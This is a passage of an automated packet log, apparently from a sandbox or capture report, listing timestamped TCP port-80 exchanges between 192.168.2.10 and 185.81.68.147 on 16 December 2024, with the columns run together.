                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.219619036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.219710112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.220334053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.262150049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.366539955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.366570950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.366689920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.367099047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.367115021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.367163897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.367203951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.367988110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.368041992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.368097067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.368834019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.368906021 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.368923903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.369682074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.369724989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.369863033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.370635986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.370681047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.370742083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.371447086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.371545076 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.371558905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.372359991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.372401953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.372416019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374213934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374228001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374238968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374250889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374258041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374310017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.374979973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.375051975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.375125885 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.375886917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.375931978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.375988007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.376718998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.376765013 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.376823902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.377593040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.377636909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.377729893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.378483057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.378528118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.378565073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.379487991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.379533052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.379586935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.380244970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.380377054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.380454063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.381102085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.381145000 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.381267071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.381974936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.382019043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.382076979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.382889986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.382931948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.382968903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.383749962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.383791924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.383810043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.384603024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.384676933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.384774923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.385478973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.385528088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.385584116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.386379957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.386421919 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.386468887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.387236118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.387276888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.387350082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.388308048 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.388349056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.388401031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.389017105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.389059067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.389132977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.389909983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.389956951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.390012026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.390769005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.390814066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.390866041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.391659021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.391697884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.391844034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.392505884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.392549038 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.392611027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.393424988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.393459082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.393472910 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.394334078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.394378901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.394479036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.395231962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.395275116 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.395338058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.396071911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.396111965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.396166086 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.396950960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.397017002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.397057056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.397846937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.397886992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.397896051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400568962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400587082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400599003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400610924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400623083 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400634050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400644064 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.400717974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.401597977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.401612043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.401642084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.402420998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.402465105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.402612925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.403247118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.403259993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.403352976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.404174089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.404186010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.404226065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405039072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405060053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405083895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405703068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405792952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.405967951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.406699896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.406738043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.406743050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.407594919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.407607079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.407634020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.408610106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.408622026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.408689022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.409277916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.409457922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.409480095 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.410173893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.410248041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.410336971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.411066055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.411103964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.411232948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.411993027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.412034988 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.412164927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.465255022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.558809996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.558882952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.559068918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.559190989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.559286118 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.559370041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.560054064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.560363054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.560462952 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.561192036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562865973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562887907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562899113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562910080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562952995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.562973976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.563013077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.563051939 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.563287973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564064026 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564142942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564158916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564804077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564867020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.564959049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.565665007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.565844059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.565927029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.566498041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.566549063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.566612959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.567404985 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.567486048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.567495108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.568296909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.568377018 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.568392992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.569164991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.569257975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.569354057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.570033073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.570192099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.570286989 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.570985079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.571038961 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.571038961 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.571846962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.571979046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.572114944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.572632074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.572686911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.572743893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.573529005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.573609114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.573625088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.574438095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.574537992 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.574546099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.575292110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.575345993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.575453997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.576196909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.576286077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.576299906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.577054024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.577194929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.577294111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.577893019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.577955008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.578053951 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.578797102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.578850985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.578897953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.579684019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.579771996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.579899073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.580569029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.580677032 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.580689907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.581443071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.581593990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.581692934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.582344055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.582469940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.582544088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.583184004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.583225965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.583326101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.584062099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.584112883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.584203005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.584984064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.585088968 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.585179090 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.585887909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.585942984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.585962057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.586792946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.586872101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.586889982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.587577105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.587671995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.587697983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.588474035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.588486910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.588579893 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.589323044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.589518070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.589610100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.590190887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.590267897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.590292931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:57.591085911 CET8049723185.81.68.147192.168.2.10
